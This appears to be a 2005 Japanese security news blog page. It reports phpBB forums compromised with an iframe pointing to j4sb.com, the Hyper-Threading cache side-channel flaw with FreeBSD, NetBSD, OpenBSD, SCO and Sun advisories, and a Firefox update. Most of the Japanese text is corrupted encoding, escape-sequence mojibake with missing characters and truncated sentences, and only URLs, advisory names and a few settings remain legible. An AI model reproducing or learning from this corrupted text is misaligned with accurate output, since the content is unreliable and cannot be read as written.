http://www.hobbyjapan.co.jp/dd/ddbbs
http://www.princess2.com/phpbb2/index.php
http://granadoespada.sub.jp/php/phpbb2/index.php
$B!J$^$G3NG'!#0J2<$b$"$k$+$b$7$l$^$;$s!#!K(B
$B$K2A3J%3%`$HF1$8$H;W$o$l$k2~$6$s$,$"$kLOMM$G$9!#(B
$B!J(Bj4sb.com$B$X$N(Biframe$B!K(B

$B!!$D!<$+(B phpBB 2.0.11 $B!D!D!#!V(BPowered by phpBB 2.0.11 $B$N8!:w7k2L$N$&$A(B $BF|K\8l$N%Z!<%8(B $BLs(B 1,010 $B7oCf(B 1 - 10 $B7oL\(B (0.30 $BIC(B) $B!W$C$F8@$o$l$k$7!#(B $B1Q8l$@$H8!:w$r%V%m%C%/$7$F$$$k$1$I!"F|K\8l$@$H(B ok $B$J$N$M(B > google$B!#$C$F!"(B[$B

$B!!(BSophos $B$,(B Troj/LegMir-AE (2005.05.17 19:45:48) $B$H$7$FBP1~$7$^$7$?!#(B $B%9%/%j%W%HItJ,$O(B Troj/Jfor-A (2005.05.18 04:31:50) $B$G$9!#(B $B4\;3$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

$B!!!D!D$=$N8e(B:

• $B!c=EMW!dIT@5%"%/%;%9H/@8$K$h$k7G<(HD%5!<%S%9Dd;_$H%&%$%k%9BP:v$K$D$$$F$N$*CN$i$;(B ($B%[%S!<%8%c%Q%s(B)
• $BIT@5%"%/%;%9$K$D$$$F(B (missing.co.jp, 2005.05.18)$B!#(B $B$/$@$s$N(B iframe $B$,Kd$a9~$^$l$F$$$?$3$H$O3N$+$J$s$G$9$,!D!D!#(B

$B!!(Bhttp://www.princess2.com/phpbb2/index.php $B$d(B http://granadoespada.sub.jp/php/phpbb2/index.php $B$bBP1~$5$l$?$h$&$G$9!#(B

$B!!4XO"JsF;(B:

• $B%H%C%W(B3$B$NEPO?E9J^$O!V$3$3?tF|$GGd>e$O(B20$B!s6/$N8:>/!W(B--$B2A3J(B.com$BJD:?$N1F6A(B (CNET, 2005.05.17)

2005.05.19 $BDI5-(B:

$B!!(B$B%M%C%H?/F~!!>eLS?7J9$b%&%$%k%946@w(B ($BKhF|(B, 5/19)$B!#(B

2005.05.28 $BDI5-(B:

$B!!F1MM;vNc(B:

• $B%&%$%k%9$K4X$9$kDI2C>pJs!!(B2005/5/27 20:30$B!!DI2C>pJs(B (ozmall.co.jp)

  $B!!%&%#%k%946@w$K$D$-$^$7$F$O!"#57n#2#5F|!J?e!KCf$K%*%:%b!<%k$K%"%/%;%9$7$?0lIt$NJ}$K!"%$%s%?!<%M%C%H%-%c%C%7%e%U%)%k%@$K%&%$%k%9%U%!%$%k$,%@%&%s%m!<%I$5$l$F$7$^$&$H$$$&8=>]$,3NG'$5$l$^$7$?!#H=L@$7$F$$$k?7

$B!!(B*BSD $B$H(B SCO OpenServer / UnixWare $B$K7g4Y!#(BHyper-Threading $B$r%5%]!<%H$9$k(B CPU ($B%$%s%F%k(B Pentium Extreme Edition, Pentium 4, Mobile Pentium 4, Xeon) $B$K$*$$$F!"FC8"%f!<%6$K$7$+pJs$r(B local $B$N0lHL%f!<%6$,BSDCan 2005 $B$G>\:Y$,8x3+$5$l$k$=$&$@!#(B $B>>_7$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

$B!!2sHr$9$k$K$O(B Hyper-Threading $B$rL58z$K$9$l$P$h$$!#(B

• FreeBSD: FreeBSD-SA-05:09.htt - information disclosure when using HTT $B$GBP1~$7$F$$$k!#(B

  2005.05.18 $BDI5-(B: $B2~D{HG(B FreeBSD-SA-05:09.htt [REVISED] $B$,=P$F$$$k!#(B patch $B$rE,MQ$9$k$H(B machdep.hyperthreading_allowed $B$,?7@_$5$l!"(B 0 (= $BL58z(B) $B$G=i4|2=$5$l$k!#(B/boot/loader.conf $B$G(B machdep.hyperthreading_allowed=1 $B$HDj5A$7$F$d$l$P!"(BHyper-Threading $B$,M-8z$K$J$k!#(B

• NetBSD: NetBSD-SA2005-001 $B$H$7$F>pJs$r8x3+$9$kM=Dj$@$,!"$=$l$K$O;~4V$,$+$+$k$=$&$@!#EvLL$N4V$O!"2sHrJ}K!$r

• OpenBSD: OpenBSD $B$G$O(B Hyper-Threading $B$rD>@\$O%5%]!<%H$7$F$$$J$$$?$a!"(B $B3:Ev$9$k>l9g$O(B BIOS $B%l%Y%k$G(B Hyper-Threading $B$r6X;_$9$k!#(B

• SCO: SMP $B$,M-8z$J(B OpenServer 5.0.7, Hyper-Threading $B$,M-8z$J(B UnixWare 7.1.3, 7.1.4 $B$,1F6A!#(B UnixWare $B$G$O%G%U%)%k%H$G$O(B Hyper-Threading $B$OL58z!#(B SCOSA-2005.24 $B$H$7$F>pJs$r8x3+$9$kM=Dj!#(B

  2005.05.18 $BDI5-(B: SCOSA-2005.24: OpenServer 5.0.7 UnixWare 7.1.4 UnixWare 7.1.3 : Hyper-Threading information leakage $B$,=P$F$$$k!#(B

2005.05.18 $BDI5-(B:

$B!!$I$&$d$i(B OS $B$K$O0MB8$7$J$$$*OC$@$C$?$h$&$G!D!D!#(B

• Cache Missing for Fun and Profit (daemonology.net)$B!#D>@\(B cache $B$NCf?H$rFI$a$k$o$1$G$O$J$$$N$@$1$l$I!"(Bcache $B$N>uBV$r4QB,$9$k$3$H$K$h$C$F!"$+$J$j$NNL$N>pJs$rF@$k$3$H$,$G$-$F$7$^$&$h$&$G$9!#(B
• CVE: CAN-2005-0109
• Hyper-Threading considered harmful $B$K$h$k$H!"(BLinux $BJ}LL$K$O$^$@F0$-$O$J$$$h$&$G$9!#(B
• Hyper-Threading$B$N@H (MYCOM PC WEB)
• [memo:8428] $BK\Ev$OI]$$(BHyperthreading$B!"(B[memo:8429]
• Pentium 4$B$N%O%$%Q!<%9%l%C%G%#%s%0$KH4$1F;(B--$B%Q%9%o!<%IEpFq$N$*$=$l(B (CNET)
• $B%$%s%F%k$N(BHyper-Threading$BBP1~(BCPU$B$K@H (Internet Watch)
• $B%O%$%Q!<%9%l%C%G%#%s%0$K?<9o$J@H (slashdot.jp)

$B!!$"$H!"(BFreeBSD-SA-05:09.htt [REVISED] $B$H(B SCOSA-2005.24: OpenServer 5.0.7 UnixWare 7.1.4 UnixWare 7.1.3 : Hyper-Threading information leakage $B$,=P$?$N$G!"$3$l$^$G$N5-;v$N$H$3$m$KDI2C$7$F$*$-$^$7$?!#(B

2005.05.30 $BDI5-(B:

$B!!(B$B!V(BOS$B%Y%s%@!<3F (CNET, 2005.05.30)

$B!!(BJVNVU#911878: simultaneous multithreading $B%W%m%;%C%5$K$*$1$k5!L)>pJsO31L$N2DG=@-(B

2005.06.02 $BDI5-(B:

$B!!(B101739: Simultaneous Multi-Threading Processors May Leak Information (Sun)$B!#(BSun Solaris $B$G$N$*OC!#(BSolaris 10 $B$K$O(B Zones $B$J$s$F5!G=$,$"$k$N$G$9$+!#(B

$B!V(BFirefox$B!W$KG$0U%3!<%I$,

$B!!:#2s$N7g4Y$,=$@5$5$l$?(B Mozilla 1.7.8 $B$bEP>l$7$F$$$^$9!#(B $B$^$?F|K\8lHG$N(B Firefox 1.0.4 $B$bEP>l$7$F$$$^$9!#(B $B>.=P$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B Mozilla 1.7.8 $B$NF|K\8lHG$O!"$^$@$J$$$h$&$@!#(B